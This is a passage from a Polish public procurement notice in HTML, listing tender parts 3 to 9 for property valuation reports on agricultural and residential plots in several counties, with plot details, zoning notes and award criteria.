oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">JAKOŚĆ – DOŚWIADCZENIE RZECZOZNAWCY WYKONUJĄCEGO OPERAT</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">POTWIERDZENIE AKTUALNOŚCI OPERATU SZACUNKOWEGO W RAMACH ZAOFEROWANEJ CENY</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zadanie nr 3<br/>Sporządzenie operatów szacunkowych na wycenę nieruchomości: <br/>1.	Działka nr 475/3 o powierzchni 0,1224 ha, obręb Iwiec, gmina Cekcyn, powiat tucholski. Charakterystyka nieruchomości – działka niezabudowana. W studium Uwarunkowań<br/>i Kierunków Zagospodarowania Przestrzennego Gminy działka oznaczona jest jako teren rolniczej przestrzeni produkcyjnej. Posiada dostęp do drogi, położona w kompleksie działek rolniczych.<br/>2.	Działka nr 201/5 o powierzchni 0,0800 ha, obręb Wielka Klonia, gmina Gostycyn, powiat tucholski. Charakterystyka nieruchomości – działka niezabudowana. W studium Uwarunkowań<br/>i Kierunków Zagospodarowania Przestrzennego Gminy leży w strefie B-wielofunkcyjna(B2), obszary zabudowy miejscowości-z dopuszczeniem uzupełnień, przekształceń i rehabilitacji zabudowy istniejącej oraz rozwoju przestrzennego miejscowości. Posiada dostęp do drogi, położona pośród zabudowy wsi. <br/>3.	Działka nr 256/13 o powierzchni 0,3272 ha, obręb Pruszcz, gmina Gostycyn, powiat tucholski.<br/>Charakterystyka nieruchomości – działka niezabudowana. W studium Uwarunkowań i Kierunków Zagospodarowania Przestrzennego Gminy strefa A-ekologiczna, Obszar Chronionego Krajobrazu Doliny rzeki Sępoleński, częściowo strefa B ochrony konserwatorskiej. Posiada dostęp do drogi, położona w kompleksie działek rolniczych.<br/>4.	Działka nr 338/5 o powierzchni 0,5000 ha, obręb Wielki Mędromierz, gmina Gostycyn, powiat tucholski. Charakterystyka nieruchomości – działka niezabudowana. W studium Uwarunkowań<br/>i Kierunków Zagospodarowania Przestrzennego Gminy strefa B-wielofunkcyjna (B1), grunty rolne chronione klas I-III, częściowo pozostałe tereny rolne-nie objęte ochroną oraz nie wskazywane do przekształceń. <br/>5.	Działka nr 7/5, 7/6, 7/7 i 7/8 o łącznej powierzchni 0,8984 ha, obręb Łyskowo, gmina Gostycyn, powiat tucholski. Charakterystyka nieruchomości – działka zabudowana (ruiny domu). <br/>W studium Uwarunkowań i Kierunków Zagospodarowania Przestrzennego Gminy strefa B-wielofunkcyjna i tereny rolne. <br/>Wykonanie – 5 operatów szacunkowych w dwóch egzemplarzach w formie papierowej </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71319000-7 - Usługi biegłych</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">30 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">JAKOŚĆ – DOŚWIADCZENIE RZECZOZNAWCY WYKONUJĄCEGO OPERAT</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">POTWIERDZENIE AKTUALNOŚCI OPERATU SZACUNKOWEGO W RAMACH ZAOFEROWANEJ CENY</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zadanie nr 4<br/>Sporządzenie operatów szacunkowych na wycenę nieruchomości: <br/>1.	Działki nr 128, 129 o łącznej powierzchni 0,7200 ha, obręb Trzeciewnica, gmina Nakło nad Notecią, powiat nakielski. Dla przedmiotowej nieruchomości prowadzona jest księga wieczysta nr BY1N/00034768/7. Charakterystyka nieruchomości – nieruchomość rolna niezabudowana, użytkowana rolniczo, posiada bezpośredni dostępu do drogi publicznej. Dla nieruchomości nie obowiązuje miejscowy plan zagospodarowania przestrzennego gminy. W Studium uwarunkowań <br/>i kierunków zagospodarowania przestrzennego gminy przedmiotowa działka znajduje się na terach łąk, pastwisk, nieużytków (ZR) wskazuje się produkcję rolną, w tym ogrodniczą, sadowniczą, pszczelarską, rybną oraz produkcję leśną.<br/>Wykonanie – 1 operatu szacunkowego w dwóch egzemplarzach w formie papierowej </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71319000-7 - Usługi biegłych</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">30 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">JAKOŚĆ – DOŚWIADCZENIE RZECZOZNAWCY WYKONUJĄCEGO OPERAT</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">POTWIERDZENIE AKTUALNOŚCI OPERATU SZACUNKOWEGO W RAMACH ZAOFEROWANEJ CENY</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 5</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zadanie nr 5<br/>Sporządzenie operatów szacunkowych na wycenę nieruchomości: <br/>1.	Działka nr 171 powierzchnia 0,0230 ha (B), obręb Gocanowo, gmina Kruszwica, powiat inowrocławski, KW KW BY1I/00028693/0. Działka nr 174 powierzchnia 0,0580 ha (B), obręb Gocanowo gmina Kruszwica, powiat inowrocławski, KW BY1I/00028703/4. <br/>Charakterystyka nieruchomości - działka 171 zabudowana budynkiem mieszkalnym. Należy wycenić budynek mieszkalny i pozostałe budynki znajdujące się na działce oraz grunt, następnie wycenić dz. nr 174 stanowiącą ogródek przydomowy. Wykonawca zobowiązany jest dostarczyć świadectwo charakterystyki energetycznej budynku. Zgodnie ze studium polityki przestrzennej działki znajdują się w granicach strefy konserwatorskiej „B”. Jest to obszar w strefie rolniczo osadniczej oznaczonej symbolem C obszar o rolniczym charakterze. Ponadto dz. nr 174, znajduje się w granicach głównego zbiornika wód podziemnych.<br/>2.	Działka nr 43/4 powierzchnia 0,1313 ha (B), obręb Brześć, gmina Kruszwica, powiat inowrocławski. KW nr BY1I/00030489/4 Charakterystyka nieruchomości - działka 43/4 zabudowana budynkiem mieszkalnym. Należy wycenić budynek mieszkalny i pozostałe budynki znajdujące się na działce oraz grunt. Wykonawca zobowiązuje się dostarczyć świadectwo charakterystyki energetycznej budynku. Zgodnie ze studium polityki przestrzennej znajduje się w strefie funkcjonalnej R rolniczo – osadniczej: stanowi teren istniejącego zainwestowania.<br/>Wykonanie – 2 operatów szacunkowych w dwóch egzemplarzach w formie papierowej </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71319000-7 - Usługi biegłych</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">30 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">JAKOŚĆ – DOŚWIADCZENIE RZECZOZNAWCY WYKONUJĄCEGO OPERAT</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">POTWIERDZENIE AKTUALNOŚCI OPERATU SZACUNKOWEGO W RAMACH ZAOFEROWANEJ CENY</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 6</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zadanie nr 6<br/>Sporządzenie operatów szacunkowych na wycenę nieruchomości: <br/>1.	Działka nr 1859/17, 1859/21, 1859/23, 1859/25 o łącznej powierzchni 81,2306 ha, obręb Kowalewo gmina Szubin, powiat Nakielski. Charakterystyka nieruchomości – Dla nieruchomości obowiązuje miejscowy plan zagospodarowania przestrzennego gminy Szubin. Zgodnie z tym planem zatwierdzonym Uchwałą Rady Miejskiej w Szubinie nr XLVII/353/14 z dnia 15 maja 2014 roku działka położona jest na terenie oznaczonym symbolem 25 P/U – cele zabudowy produkcyjnej, składów i magazynów z dopuszczeniem usług. Uwaga! Wyceny należy dokonać <br/>z rozbiciem wartości na poszczególne działki.<br/>Wykonanie – 1 operatu szacunkowego w dwóch egzemplarzach w formie papierowej </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71319000-7 - Usługi biegłych</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">30 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">JAKOŚĆ – DOŚWIADCZENIE RZECZOZNAWCY WYKONUJĄCEGO OPERAT</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">POTWIERDZENIE AKTUALNOŚCI OPERATU SZACUNKOWEGO W RAMACH ZAOFEROWANEJ CENY</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 7</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zadanie nr 7<br/>Sporządzenie operatów szacunkowych na wycenę nieruchomości: <br/>1.	Działka nr 318 powierzchnia 0,4256 ha (Br-RIIIb), obręb Wylatowo, gmina Mogilno, <br/>powiat mogileński, KW BY1M/00030491/5. Charakterystyka nieruchomości - działka 318 zabudowana budynkiem mieszkalnym dwurodzinnym. Należy wycenić lokal mieszkalny nr 1 i nr 2 w budynku nr 98 wraz z przynależnościami oraz udziałem w gruncie i uzyskaniem samodzielności lokali. Wykonawca zobowiązany jest dostarczyć świadectwo charakterystyki energetycznej budynku. Zgodnie ze studium znajduje się w strefie funkcjonalnej R rolniczo – osadniczej: stanowi teren istniejącego zainwestowania.<br/>2.	Działka nr 4/10 powierzchnia 0,1766 ha (B-0,1766), obręb Bąkowo, gmina Dąbrowa Biskupia, powiat inowrocławski, KW BY1I/00034662/9. Charakterystyka nieruchomości - Działka 4/10 zabudowana budynkiem mieszkalnym wielorodzinnym. Należy wycenić lokal mieszkalny nr 2 z przynależnościami i udziałem w gruncie, oraz uzyskać samodzielność lokalu. Wykonawca zobowiązany jest dostarczyć świadectwo charakterystyki energetycznej budynku. Zgodnie ze studium polityki przestrzennej znajduje się w strefie rolniczo-osadniczej oznaczonej symbolem C obszar o rolniczym charakterze. Wykonawca zobowiązany jest dostarczyć świadectwo charakterystyki energetycznej budynku.<br/>3.	Działka nr 44/1 powierzchnia 0,4373 ha (Br-RV), obręb Szarlej, gmina Kruszwica, powiat inowrocławski, KW BY1I/00048796/8. Charakterystyka nieruchomości - Działka 44/1 zabudowana budynkiem mieszkalnym wielorodzinnym i budynkami gospodarczymi. Należy wycenić 4 lokale mieszkalne wraz z przynależnościami oraz udziałem w gruncie, i uzyskaniem samodzielności lokali oraz ujawnieniem w rejestrze gruntów. Wykonawca jest zobowiązany dostarczyć świadectwo charakterystyki energetycznej budynku. Zgodnie ze studium polityki przestrzennej znajduje się w strefie wiejskiej oznaczona symbolem B – rolniczo-leśnej przestrzeni produkcyjnej z osadnictwem skoncentrowanym, umiarkowanym rozwojem funkcji produkcyjno-usługowych, oraz częściowo w strefie ochrony konserwatorskiej „B” i ochrony archeologicznej „W”.<br/><br/>4.	Działka nr 158/2 powierzchnia 0,4926 ha (RIIIb - 0,02321, Br-RIIIb – 0,2601), obręb Wola Wapowska, gmina Kruszwica, powiat inowrocławski, KW BY1I/00055790/8. Charakterystyka nieruchomości - Działka 158/2 zabudowana budynkiem mieszkalnym wielorodzinnym. Należy wycenić lokal mieszkalny z przynależnościami i udziałem w gruncie, <br/>oraz uzyskać samodzielność lokalu. Wykonawca zobowiązany jest dostarczyć świadectwo charakterystyki energetycznej lokalu. Zgodnie ze studium polityki przestrzennej znajduje <br/>się w granicach strefy konserwatorskiej „B”. Jest to obszar w strefie wiejskiej oznaczony symbolem B – rolniczo-leśnej przestrzeni produkcyjnej.<br/>Wykonanie – 4 operaty szacunkowe w dwóch egzemplarzach w formie papierowej </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71319000-7 - Usługi biegłych</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">30 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">JAKOŚĆ – DOŚWIADCZENIE RZECZOZNAWCY WYKONUJĄCEGO OPERAT</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">POTWIERDZENIE AKTUALNOŚCI OPERATU SZACUNKOWEGO W RAMACH ZAOFEROWANEJ CENY</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 8</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zadanie nr 8<br/>Sporządzenie operatów szacunkowych na wycenę nieruchomości: <br/>1.	Działka nr 283/8 o powierzchni 0,1147 ha, obręb Szubin-miasto, gmina Szubin, powiat nakielski. Charakterystyka nieruchomości – nieruchomość nie rolna, niezabudowana, posiada dostęp do drogi publicznej. Dla ww. nieruchomości prowadzona jest KW nr BY1U/00017442/7. W obowiązującym miejscowym planie zagospodarowania przestrzennego gminy Szubin teren działki oznaczony jest symbolem B 3M/U teren zabudowy mieszkaniowej jednorodzinnej z dopuszczeniem nie uciążliwych usług.<br/>2.	Działka nr 283/9 o powierzchni 0,1107 ha, obręb Szubin-miasto, gmina Szubin, powiat nakielski. Charakterystyka nieruchomości – nieruchomość nie rolna, niezabudowana, posiada dostęp do drogi publicznej. Dla ww. nieruchomości prowadzona jest KW nr BY1U/00017442/7. W obowiązującym miejscowym planie zagospodarowania przestrzennego gminy Szubin teren działki oznaczony jest symbolem B 3M/U teren zabudowy mieszkaniowej jednorodzinnej z dopuszczeniem nie uciążliwych usług.<br/>3.	Działka nr 283/10 o powierzchni 0,1084 ha, obręb Szubin-miasto, gmina Szubin, powiat nakielski. Charakterystyka nieruchomości – nieruchomość nie rolna, niezabudowana, posiada dostęp do drogi publicznej. Dla ww. nieruchomości prowadzona jest KW nr BY1U/00017442/7. W obowiązującym miejscowym planie zagospodarowania przestrzennego gminy Szubin teren działki oznaczony jest symbolem B 3M/U teren zabudowy mieszkaniowej jednorodzinnej z dopuszczeniem nie uciążliwych usług.<br/>4.	Działka nr 283/11 o powierzchni 0,0985 ha, obręb Szubin-miasto, gmina Szubin, powiat nakielski. Charakterystyka nieruchomości – nieruchomość nie rolna, niezabudowana, posiada dostęp do drogi publicznej. Dla ww. nieruchomości prowadzona jest KW nr BY1U/00017442/7. W obowiązującym miejscowym planie zagospodarowania przestrzennego gminy Szubin teren działki oznaczony jest symbolem B 3M/U teren zabudowy mieszkaniowej jednorodzinnej z dopuszczeniem nie uciążliwych usług.<br/>5.	Działka nr 283/12 o powierzchni 0,0939 ha, obręb Szubin-miasto, gmina Szubin, powiat nakielski. Charakterystyka nieruchomości – nieruchomość nie rolna, niezabudowana, posiada dostęp do drogi publicznej. Dla ww. nieruchomości prowadzona jest KW nr BY1U/00017442/7. W obowiązującym miejscowym planie zagospodarowania przestrzennego gminy Szubin teren działki oznaczony jest symbolem B 3M/U teren zabudowy mieszkaniowej jednorodzinnej z dopuszczeniem nie uciążliwych usług.<br/>6.	Działka nr 283/13 o powierzchni 0,0891 ha, obręb Szubin-miasto, gmina Szubin, powiat nakielski. Charakterystyka nieruchomości – nieruchomość nie rolna, niezabudowana, posiada dostęp do drogi publicznej. Dla ww. nieruchomości prowadzona jest KW nr BY1U/00017442/7. <br/>W obowiązującym miejscowym planie zagospodarowania przestrzennego gminy Szubin teren działki oznaczony jest symbolem B 3M/U teren zabudowy mieszkaniowej jednorodzinnej z dopuszczeniem nie uciążliwych usług.<br/>7.	Działka nr 283/14 o powierzchni 0,0846 ha, obręb Szubin-miasto, gmina Szubin, powiat nakielski. Charakterystyka nieruchomości – nieruchomość nie rolna, niezabudowana, posiada dostęp do drogi publicznej. Dla ww. nieruchomości prowadzona jest KW nr BY1U/00017442/7. W obowiązującym miejscowym planie zagospodarowania przestrzennego gminy Szubin teren działki oznaczony jest symbolem B 3M/U teren zabudowy mieszkaniowej jednorodzinnej z dopuszczeniem nie uciążliwych usług.<br/>8.	Działka nr 283/15 o powierzchni 0,0760 ha, obręb Szubin-miasto, gmina Szubin, powiat nakielski. Charakterystyka nieruchomości – nieruchomość nie rolna, niezabudowana, posiada dostęp do drogi publicznej. Dla ww. nieruchomości prowadzona jest KW nr BY1U/00017442/7. <br/>W obowiązującym miejscowym planie zagospodarowania przestrzennego gminy Szubin teren działki oznaczony jest symbolem B 3M/U teren zabudowy mieszkaniowej jednorodzinnej z dopuszczeniem nie uciążliwych usług.<br/>9.	Działka nr 283/16 o powierzchni 0,2692 ha, obręb Szubin-miasto, gmina Szubin, powiat nakielski. Charakterystyka nieruchomości – nieruchomość nie rolna, niezabudowana, posiada dostęp do drogi publicznej. Dla ww. nieruchomości prowadzona jest KW nr BY1U/00017442/7. <br/>W obowiązującym miejscowym planie zagospodarowania przestrzennego gminy Szubin teren działki oznaczony jest symbolem B1 RL teren rolny bez prawa zabudowy.<br/>Wykonanie – 9 operatów szacunkowych w dwóch egzemplarzach w formie papierowej </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71319000-7 - Usługi biegłych</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">30 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">JAKOŚĆ – DOŚWIADCZENIE RZECZOZNAWCY WYKONUJĄCEGO OPERAT</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">POTWIERDZENIE AKTUALNOŚCI OPERATU SZACUNKOWEGO W RAMACH ZAOFEROWANEJ CENY</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 9</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zadanie nr 9<br/>Sporządzenie operatów szacunkowych na wycenę nieruchomości: <br/>1.	Działka nr 23/7 powierzchnia 0,2156 ha, obręb Wysocin gmina Bądkowo, powiat aleksandrowski. Charakterystyka nieruchomości – rolna niezabudowana, Działka w kompleksie gruntów rolnych ma regularny kształt, płaski nieutrudniający użytkowanie, posiada dostępu do drogi publicznej .<br/>2.	Działka nr 15/3 o powierzchni 0,4383 ha, obręb Rożno Parcele gmina Aleksandrów Kujawski, powiat aleksandrowski. Charakterystyka nieruchomości –rolna niezabudowana, Działka w obszarze rolnej i leśnej przestrzeni produkcyjnej, ma regularny kształt, płaski nieutrudniający użytkowanie, nie posiada dostępu do drogi publicznej.<br/>3.	Działka nr 15/8 powierzchnia 0,5018 ha, Rożno Parcele gmina Aleksandrów Kujawski, powiat aleksandrowski. Charakterystyka nieruchomości –rolna niezabudowana, Działka w obszarze rolnej i leśnej przestrzeni produkcyjnej, ma regularny kształt, płaski nieutrudniający użytkowanie, nie posiada dostępu do drogi publicznej.<br/>4.	Działka nr 224/6 powierzchnia 0,4047 ha, obręb Podgaj, gmina Aleksandrów Kujawski, powiat aleksandrowski. Charakterystyka nieruchomości – rolna niezabudowana, Działka w kompleksie gruntów rolnych ma regularny kształt, płaski nieutrudniający użytkowanie, posiada dostępu do drogi 